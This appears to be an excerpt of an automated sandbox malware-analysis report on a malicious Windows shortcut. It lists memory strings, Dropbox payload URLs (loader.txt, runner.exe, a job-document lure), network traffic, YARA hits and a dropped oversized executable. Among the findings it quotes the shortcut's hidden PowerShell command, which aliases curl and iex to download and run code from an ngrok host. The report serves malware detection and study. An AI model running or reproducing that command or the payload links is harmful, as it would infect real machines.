                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com/cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYc
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97D96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201114FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/9t9vl9gk9xm4lc1q5j1w2/loader.txt?rlkey=2k6bvt9zpjr10kshfjrooidha&dl=1
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/uX
                      Source: powershell.exe, 00000013.00000002.2531867358.000002010ED66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/z
                      Source: powershell.exe, 00000013.00000002.2531867358.000002010ED66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-des
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.5:49835 version: TLS 1.2
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_33388cb4-a
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_29b4ee33-5
                      Source: Yara matchFile source: 27.3.fontdrvhost.exe.5880000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.4ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.fontdrvhost.exe.5660000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.5100000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.5100000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2679593309.0000000005660000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe PID: 8992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 8596, type: MEMORYSTR

                      System Summary

                      barindex
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeFile dump: PerfectoUna.exe.25.dr 979567147Jump to dropped file
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeJump to dropped file
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: xWpAZpLw47.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000160FB071AA4 NtAcceptConnectPort,NtAcceptConnectPort,31_2_00000160FB071AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000160FB071CF4 NtAcceptConnectPort,CloseHandle,31_2_00000160FB071CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000160FB0715C0 NtAcceptConnectPort,31_2_00000160FB0715C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000160FB070AC8 NtAcceptConnectPort,NtAcceptConnectPort,31_2_00000160FB070AC8
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F44D0C3_2_00007FF848F44D0C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F44CA53_2_00007FF848F44CA5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848F1A3F819_2_00007FF848F1A3F8
